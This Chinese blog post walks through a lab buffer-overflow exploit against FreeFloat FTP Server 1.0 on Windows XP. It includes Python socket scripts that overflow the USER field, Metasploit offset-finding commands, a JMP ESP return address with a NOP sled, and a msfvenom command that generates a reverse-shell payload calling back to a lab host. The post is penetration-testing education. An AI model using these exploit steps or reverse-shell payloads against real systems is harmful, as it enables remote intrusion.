<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>FTP溢出漏洞分析 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="缓冲区溢出 缓冲区：暂时置放输出或输入资料的内存 缓冲区溢出：缓冲区溢出是指当计算机向缓冲区填充数据时超出了缓冲区本身的容量，溢出的数据覆盖在合法数据上。  溢出漏洞测试测试准备 渗透测试目标：FreeFloat FTP Server1.0，该软件带有溢出漏洞 WindowsXP系统:将该软件放入WindowsXP中，IP地址为192.168.75.130 Windows 7系统：对该软件进行测试">
<meta property="og:type" content="article">
<meta property="og:title" content="FTP溢出漏洞分析">
<meta property="og:url" content="https://fightingtree.github.io/2019/11/26/FTP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="缓冲区溢出 缓冲区：暂时置放输出或输入资料的内存 缓冲区溢出：缓冲区溢出是指当计算机向缓冲区填充数据时超出了缓冲区本身的容量，溢出的数据覆盖在合法数据上。  溢出漏洞测试测试准备 渗透测试目标：FreeFloat FTP Server1.0，该软件带有溢出漏洞 WindowsXP系统:将该软件放入WindowsXP中，IP地址为192.168.75.130 Windows 7系统：对该软件进行测试">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://pic3.superbed.cn/item/5df5bba3a4fbc8614a805eb2.jpg">
<meta property="og:image" content="https://pic2.superbed.cn/item/5df5bd1aa4fbc8614a809a19.jpg">
<meta property="og:image" content="https://pic2.superbed.cn/item/5df5be68a4fbc8614a80ec2e.jpg">
<meta property="og:image" content="https://pic3.superbed.cn/item/5df5c192a4fbc8614a819df9.jpg">
<meta property="og:image" content="https://pic2.superbed.cn/item/5df5c4cea4fbc8614a822fa3.jpg">
<meta property="og:image" content="https://pic.superbed.cn/item/5df5c803a4fbc8614a82bb2b.jpg">
<meta property="og:image" content="https://i.postimg.cc/Vs241S6h/7.jpg">
<meta property="og:image" content="https://i.postimg.cc/HsQ0gBFJ/8.png">
<meta property="og:image" content="https://i.postimg.cc/wjqNdHhP/9.png">
<meta property="og:image" content="https://i.postimg.cc/0yXzRS5M/10.png">
<meta property="og:image" content="https://i.postimg.cc/nccVFLPv/11.jpg">
<meta property="og:image" content="https://i.postimg.cc/rmn3rRqK/12.jpg">
<meta property="article:published_time" content="2019-11-26T05:11:44.000Z">
<meta property="article:modified_time" content="2019-12-18T06:28:26.166Z">
<meta property="article:author" content="fightingtree">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic3.superbed.cn/item/5df5bba3a4fbc8614a805eb2.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://fightingtree.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-FTP" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/11/26/FTP/" class="article-date">
  <time datetime="2019-11-26T05:11:44.000Z" itemprop="datePublished">2019-11-26</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      FTP溢出漏洞分析
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="缓冲区溢出"><a href="#缓冲区溢出" class="headerlink" title="缓冲区溢出"></a>缓冲区溢出</h2><ul>
<li>缓冲区：暂时置放输出或输入资料的内存</li>
<li>缓冲区溢出：缓冲区溢出是指当计算机向缓冲区填充数据时超出了缓冲区本身的容量，溢出的数据覆盖在合法数据上。</li>
</ul>
<h2 id="溢出漏洞测试"><a href="#溢出漏洞测试" class="headerlink" title="溢出漏洞测试"></a>溢出漏洞测试</h2><h3 id="测试准备"><a href="#测试准备" class="headerlink" title="测试准备"></a>测试准备</h3><ul>
<li>渗透测试目标：FreeFloat FTP Server1.0，该软件带有溢出漏洞</li>
<li>WindowsXP系统:将该软件放入WindowsXP中，IP地址为192.168.75.130</li>
<li>Windows 7系统：对该软件进行测试，该主机需带装有python运行环境，IP地址为192.168.75.131。</li>
<li>Kali Linux系统</li>
</ul>
<h3 id="测试过程"><a href="#测试过程" class="headerlink" title="测试过程"></a>测试过程</h3><h4 id="在WindowsXP中运行软件"><a href="#在WindowsXP中运行软件" class="headerlink" title="在WindowsXP中运行软件"></a>在WindowsXP中运行软件</h4><p>如图所示：<br><img src="https://pic3.superbed.cn/item/5df5bba3a4fbc8614a805eb2.jpg" alt=""></p>
<h4 id="在Windows7中开始测试"><a href="#在Windows7中开始测试" class="headerlink" title="在Windows7中开始测试"></a>在Windows7中开始测试</h4><h5 id="正常登录"><a href="#正常登录" class="headerlink" title="正常登录"></a>正常登录</h5><p>在终端依次输入以下命令连接FTP：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ftp</span><br><span class="line">open 192.168.75.130  //WindowsXP的IP地址</span><br></pre></td></tr></table></figure>
<p>输入任意用户名和密码登录到FTP，如图所示：<br><img src="https://pic2.superbed.cn/item/5df5bd1aa4fbc8614a809a19.jpg" alt=""></p>
<p>现在我们已经成功登录，可以使用FTP中的任意资源了。(这里使用任何一个用户名都可以成功登录)</p>
<h5 id="溢出测试"><a href="#溢出测试" class="headerlink" title="溢出测试"></a>溢出测试</h5><p>我们重复正常登录的步骤，只不过此次测试的用户名和密码我们可以输入超长字符串进行测试，测试的同时使用wiresharke进行抓包分析：<br>测试1(超长字符串a，字符串长度随机)：<br><img src="https://pic2.superbed.cn/item/5df5be68a4fbc8614a80ec2e.jpg" alt=""><br>对上述操作所抓取的数据包如下所示：<br><img src="https://pic3.superbed.cn/item/5df5c192a4fbc8614a819df9.jpg" alt=""></p>
<p>测试2(超长字符串b，字符串长度随机)：<br><img src="https://pic2.superbed.cn/item/5df5c4cea4fbc8614a822fa3.jpg" alt=""><br>对上述操作所抓取的数据包如下所示：<br><img src="https://pic.superbed.cn/item/5df5c803a4fbc8614a82bb2b.jpg" alt=""></p>
<p>进行上述测试后，我们发现目标的系统仍然正常登录，系统并没有崩溃。但是，对数据包进行分析，我们会发现不论我们随机输入多少超长字符串，最终发送的只有78个字符(a、b)，显然这个长度的字符串无法引起溢出，但是我们可以通过自行构造数据包，然后将数据包发送出去。</p>
<h5 id="用Python编写数据包"><a href="#用Python编写数据包" class="headerlink" title="用Python编写数据包"></a>用Python编写数据包</h5><p>在Windows 7中安装Python运行环境(IDLE),在IDLE中执行下列代码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">import socket  <span class="comment">#导入需要使用的socket库</span></span><br><span class="line">s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  <span class="comment">#创建一个套接字</span></span><br><span class="line">connect = s.connect((<span class="string">'192.168.75.130'</span>)，21)     <span class="comment">#利用套接字建立目标的连接</span></span><br><span class="line">s.send(<span class="string">'USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n'</span>)     <span class="comment">#通过套接字将随机超长字符串(上百位)以数据包的形式发送出去</span></span><br></pre></td></tr></table></figure>
<p>在WindowsXP界面出现如下窗口则证明发送溢出：<br><img src="https://i.postimg.cc/Vs241S6h/7.jpg" alt=""><br>点击生成错误报告，可以查看发生错误的地址信息：<br><img src="https://i.postimg.cc/HsQ0gBFJ/8.png" alt=""></p>
<h3 id="计算软件溢出的偏移地址"><a href="#计算软件溢出的偏移地址" class="headerlink" title="计算软件溢出的偏移地址"></a>计算软件溢出的偏移地址</h3><p>EIP寄存器：用来存储CPU要读取指令的地址<br>根据错误报告的地址信息，以及溢出原理，出现这种情况的原因是下一条保存地址的EIP寄存器中的地址被溢出的字符“a”所覆盖,”\x61”(16进制)在ASCII表中表示的就是字符’a,也就是说现在EIP寄存器的内容就是’aaaa’,而操作系统无法在这个位置找到一条可以执行的命令，从而引发系统的崩溃。</p>
<p>我们可以在错误报告中看到EIP寄存器的地址，但是程序在操作系统中的执行是动态的，也就是说每一次这个软件执行时所分配的地址都是不同的，所以我们现在需要知道EIP寄存器相对于输入数据起始位置的相对偏移。</p>
<h4 id="借助Metasploit计算溢出的相对偏移地址"><a href="#借助Metasploit计算溢出的相对偏移地址" class="headerlink" title="借助Metasploit计算溢出的相对偏移地址"></a>借助Metasploit计算溢出的相对偏移地址</h4><p>要计算EIP寄存器相对于输入数据起始位置的相对偏移，需要使用Metasploit中内置的两个工具<font color="#fb8c00">pattern_create</font>和<font color="#fb8c00">pattern_offset</font></p>
<h5 id="使用pattern-create创建字符串"><a href="#使用pattern-create创建字符串" class="headerlink" title="使用pattern_create创建字符串"></a>使用pattern_create创建字符串</h5><p>pattern_create可以用来创建一段没有重复字符的文本，我们将这段文本发送到目标服务器，当发生溢出时，记录下程序发生错误的地址(也就是EIP中的内容)，这个地址其实就是文本中的四个字符。</p>
<p>启动Kali，打开终端输入以下指令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /usr/share/metasploit-framework/tools/exploit</span><br><span class="line">./pattern_create.rb -h  //pattern_create.rb是一个由ruby语言编写的脚本，使用-h参数可以查看可以使用的参数以及用法</span><br><span class="line">./pattern_create.rb -l 500 //生成一段500个字符的文本</span><br><span class="line"></span><br><span class="line">输出结果：</span><br><span class="line">Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq</span><br></pre></td></tr></table></figure>
<p>在python编写的数据包将send()函数传递的超长字符串换为上述文本，即在编写数据包部分将最后的传输数据部分替换为：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s.send(<span class="string">'USER Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq\r\n'</span>)</span><br></pre></td></tr></table></figure>
<p>同样地，该超长字符串会引发windowsXP中的FTP软件的溢出错误，我们同样可以根据错误报告获得溢出的地址：<br><img src="https://i.postimg.cc/wjqNdHhP/9.png" alt=""></p>
<h5 id="使用pattern-offset计算偏移地址"><a href="#使用pattern-offset计算偏移地址" class="headerlink" title="使用pattern_offset计算偏移地址"></a>使用pattern_offset计算偏移地址</h5><p>在Kali终端输入以下命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /usr/share/metasploit-framework/tools/exploit</span><br><span class="line">./pattern_offset.rb -h  //查看帮助</span><br><span class="line">./pattern_offset.rb -q 37684136 -l 500 //-q后的参数为上述错误报告中的出错地址，-l为pattern_create中生成字符串的长度</span><br><span class="line"></span><br><span class="line">输出结果：230</span><br></pre></td></tr></table></figure>
<p>上述命令的输出结果230就是EIP寄存器相对于输入数据起始位置的相对偏移，所以我们只需提供230个字符”a”就可以使FTP发生溢出错误。我们重复之前的步骤，将python构建数据包的步骤改为执行下列代码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">import socket</span><br><span class="line">buf = <span class="string">"\x61"</span>*230+<span class="string">"\x62"</span>*4  //230个<span class="string">'a'</span>字符，4个<span class="string">'b'</span>字符</span><br><span class="line">target = <span class="string">"192.168.75.130"</span>  //FTP所在主机的IP地址</span><br><span class="line">s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br><span class="line">s.connect((target,21))</span><br><span class="line">s.send(<span class="string">"USER "</span>+buf+<span class="string">"\r\n"</span>)</span><br><span class="line">s.close()   //关闭套接字</span><br></pre></td></tr></table></figure>
<p>执行结束后可以看到FTP程序已经崩溃，并且产生如下图所示错误报告：<br><img src="https://i.postimg.cc/0yXzRS5M/10.png" alt=""><br>从上图的错误地址62626262可以看出，EIP的地址已经为字符“bbbb”，这验证了我们找到的偏移地址的正确性。</p>
<h3 id="查找JMP-ESP指令"><a href="#查找JMP-ESP指令" class="headerlink" title="查找JMP ESP指令"></a>查找JMP ESP指令</h3><p>ESP：栈指针寄存器(extended stack pointer)，其内存放着一个指针，该指针永远指向系统栈最上面一个栈帧的栈顶<br>EBP：基址指针寄存器(extended base pointer)，其内存放着一个指针，该指针永远指向系统栈最上面一个栈帧的底部。</p>
<p>因为操作系统在程序的每一次执行过程中都会为其分配不同的地址，所以即使我们可以决定程序下一步执行的地址(EIP中的内容)，但是不知道我们的攻击载荷位于哪个位置，所以还是没有办法让目标服务器执行这个恶意的攻击载荷。</p>
<p>接下来我们就要想个办法，让EIP中的地址指向我们的攻击载荷，我们首先需要看一下输入的用户名数据在执行时是如何分布的，如下图所示：<br><img src="https://i.postimg.cc/nccVFLPv/11.jpg" alt=""></p>
<p>按照栈的设计，ESP寄存器应该就位于EIP寄存器之后(中间可能有一些空隙)，如下图所示：<br><img src="https://i.postimg.cc/rmn3rRqK/12.jpg" alt=""><br>因为这种设计，ESP寄存器就是我们最理想的选择，原因如下：</p>
<ol>
<li>我们在使用大量字符来溢出栈的时候，也可以使用特定的字符来覆盖ESP</li>
<li>我们虽然无法对ESP寄存器进行定位，但是可以利用一条“JMP ESP”(汇编指令)的跳转指令来实现跳转到当前ESP寄存器。</li>
</ol>
<h4 id="查找地址不会改变的JMP-ESP指令"><a href="#查找地址不会改变的JMP-ESP指令" class="headerlink" title="查找地址不会改变的JMP ESP指令"></a>查找地址不会改变的JMP ESP指令</h4><p>接下来，我们需要做的工作是找到一条地址不会发生改变的JMP ESP指令。</p>
<ul>
<li>ntdll.dll(NT Layer DLL)是Windows NT操作系统的重要模块，属于系统级别的文件。用于堆栈释放、进程管理。</li>
<li>kernel32.dll是Windows 9x/Me中非常重要的32位动态链接库文件，属于内核级文件，它控制着系统的内存管理、数据的输入输出操作和中断处理，当Windows启动时，kernel.dll就驻留在内存中特定的写保护区域，使别的程序无法占用这个内存区域。</li>
<li>一些经常会用到的动态链接会被映射到内存，如kernel32.dll、user32.dll会被几乎所有进程加载，且加载的基址始终相同(不同的操作系统可能不同)。我们只需在这些动态链接库中找到JMP ESP命令就可以了，此时我们找到的JMP ESP的地址就一直都不会变。</li>
</ul>
<p>dll文件中的JMP ESP指令的地址可以通过调试器或代码执行找到。</p>
<h3 id="编写渗透测试程序"><a href="#编写渗透测试程序" class="headerlink" title="编写渗透测试程序"></a>编写渗透测试程序</h3><h4 id="字节序"><a href="#字节序" class="headerlink" title="字节序"></a>字节序</h4><p>现在我们找到的JMP ESP指令的地址(假设为7C9D30D7)还存在一个问题，同样的地址数据在网络传输和CPU存储时的表示方法是不同的：</p>
<ul>
<li>大端(Big-Endian)：高位在前(其中“前”是指靠近内存的低地址，存储在硬盘上就是先写的字节)</li>
<li>小端(Little-Endian):低位在前(低位字节存储在内存低地址，字节高低顺序和内存高低顺序相同)</li>
</ul>
<p>网络字节序(Network Byte Order)一般指大端(对大部分网络传输协议而言)，大小端的概念是面向多字节数据类型的存储方式定义的。</p>
<h4 id="编写脚本"><a href="#编写脚本" class="headerlink" title="编写脚本"></a>编写脚本</h4><p>我们找到的JMP ESP的地址(7C9D30D7)其实是小端格式，如果我们希望使用7C9D30D7来覆盖目标地址，在使用Python编写渗透程序时就应该倒置地址’\xD7\x30\x9D\x7C’<br>此时，我们的脚本应为：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import socket</span><br><span class="line">s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br><span class="line">connect = s.connect((<span class="string">'192.168.75.130'</span>,21))</span><br><span class="line">buf = <span class="string">"\x61"</span>*230+<span class="string">"\xD7\x30\x9D\x7C"</span>  //填充230个<span class="string">'a'</span>后到达EIP寄存器，<span class="string">"\xD7\x30\x9D\x7C"</span>就是此时EIP寄存器中的内容</span><br><span class="line">s.send(<span class="string">'USER'</span>+buf+<span class="string">"\r\n"</span>)</span><br></pre></td></tr></table></figure>
<p>要对目标主机进行缓冲区溢出攻击，只需在传送的数据之后加上我们想要目标计算机上执行的代码即可(即payload)，详情请对shellcode编程进行了解，下文我们采用shellcode代替这部分代码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">import socket</span><br><span class="line">s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br><span class="line">connect = s.connect((<span class="string">'192.168.75.130'</span>,21))</span><br><span class="line">buf = <span class="string">"\x61"</span>*230+<span class="string">"\xD7\x30\x9D\x7C"</span>+shellcode  //填充230个<span class="string">'a'</span>后到达EIP寄存器，<span class="string">"\xD7\x30\x9D\x7C"</span>就是此时EIP</span><br><span class="line">寄存器中的内容</span><br><span class="line">s.send(<span class="string">'USER'</span>+buf+<span class="string">"\r\n"</span>)</span><br></pre></td></tr></table></figure>
<blockquote>
<p>注：shellcode也可以使用metasploit来生成： msfvenom -p windows/shell_reverse_tcp LHOST=192.168.75.129 LPORT=443 -b ‘\x00\x0a\x40’(坏字符) -f c</p>
</blockquote>
<h5 id="加入空指令"><a href="#加入空指令" class="headerlink" title="加入空指令"></a>加入空指令</h5><p>完成上述操作后，目标的系统FTP已经崩溃，但是，我们的shell代码却没有启动，原因就是ESP的地址向后发生了偏移，这样就导致了shellcode的代码并没有完全载入到ESP中，最前面的一部分在ESP的外面，从而导致程序不能正常执行。</p>
<p>解决上述问题的一个方法就是加入空指令”\x90”(NOPS),这个指令不会执行任何实际操作，但它也是一条指令，因此会顺序地向下执行这样即使我们不知道ESP的真实地址，只需要在EIP后面添加一些空指令，只要这些空指令足够多到将shellcode偏移进ESP，就可以顺利执行shellcode。所以此时，我们的脚本代码中的buf应该改为以下代码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">buf = <span class="string">"\x61"</span>*230+<span class="string">"\xD7\x30\x9D\x7C"</span>+<span class="string">"\x90"</span>*20+shellcode //</span><br></pre></td></tr></table></figure>

<h3 id="坏字符"><a href="#坏字符" class="headerlink" title="坏字符"></a>坏字符</h3><p>虽然上述渗透测试程序编写得很成功，但是在实际中却未必如此顺利。我们在上述示例中发送的数据都是FTP用户名的内容，如果FTP对用户名输入有限制，并过滤了一些字符，而我们的shellcode中也包含了这种不被允许的字符，就可能导致FTP服务器拒绝接收后面的内容，从而导致代码只传了一部分。所以找出坏字符也是我们溢出漏洞攻击的一个重要环节。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://fightingtree.github.io/2019/11/26/FTP/" data-id="ck5ewyoze000ei8twa6qz1xsg" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/12/01/network2/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          网络安全
        
      </div>
    </a>
  
  
    <a href="/2019/11/24/penetrationTest5/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">渗透测试(5)</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/linux/">linux</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%89%8D%E7%AB%AF%E5%BC%80%E5%8F%91/">前端开发</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">工具使用</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A8%8B%E6%80%9D%E6%83%B3/">编程思想</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/">编程语言</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/">读书笔记</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Burp-Suite/" rel="tag">Burp Suite</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/C/" rel="tag">C</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CSS/" rel="tag">CSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTML/" rel="tag">HTML</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Kali/" rel="tag">Kali</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Metasploit/" rel="tag">Metasploit</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/OOP/" rel="tag">OOP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/OWASP/" rel="tag">OWASP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Qt/" rel="tag">Qt</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/git/" rel="tag">git</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/github/" rel="tag">github</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/java/" rel="tag">java</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/javascript/" rel="tag">javascript</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/kali/" rel="tag">kali</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/phpStudy/" rel="tag">phpStudy</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/socket/" rel="tag">socket</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/vim/" rel="tag">vim</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B5%8C%E5%85%A5%E5%BC%8F%E5%BC%80%E5%8F%91/" rel="tag">嵌入式开发</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/" rel="tag">操作系统</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93/" rel="tag">数据库</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/" rel="tag">数据结构</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" rel="tag">计算机网络</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Burp-Suite/" style="font-size: 10px;">Burp Suite</a> <a href="/tags/C/" style="font-size: 17px;">C</a> <a href="/tags/CSS/" style="font-size: 11px;">CSS</a> <a href="/tags/HTML/" style="font-size: 10px;">HTML</a> <a href="/tags/Kali/" style="font-size: 13px;">Kali</a> <a href="/tags/Metasploit/" style="font-size: 10px;">Metasploit</a> <a href="/tags/OOP/" style="font-size: 11px;">OOP</a> <a href="/tags/OWASP/" style="font-size: 10px;">OWASP</a> <a href="/tags/PHP/" style="font-size: 10px;">PHP</a> <a href="/tags/Python/" style="font-size: 18px;">Python</a> <a href="/tags/Qt/" style="font-size: 14px;">Qt</a> <a href="/tags/Web/" style="font-size: 19px;">Web</a> <a href="/tags/git/" style="font-size: 10px;">git</a> <a href="/tags/github/" style="font-size: 10px;">github</a> <a href="/tags/java/" style="font-size: 10px;">java</a> <a href="/tags/javascript/" style="font-size: 13px;">javascript</a> <a href="/tags/kali/" style="font-size: 10px;">kali</a> <a href="/tags/phpStudy/" style="font-size: 10px;">phpStudy</a> <a href="/tags/socket/" style="font-size: 11px;">socket</a> <a href="/tags/vim/" style="font-size: 10px;">vim</a> <a href="/tags/%E5%AE%89%E5%85%A8/" style="font-size: 20px;">安全</a> <a href="/tags/%E5%B5%8C%E5%85%A5%E5%BC%8F%E5%BC%80%E5%8F%91/" style="font-size: 10px;">嵌入式开发</a> <a href="/tags/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/" style="font-size: 12px;">操作系统</a> <a href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93/" style="font-size: 10px;">数据库</a> <a href="/tags/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/" style="font-size: 10px;">数据结构</a> <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 16px;">渗透测试</a> <a 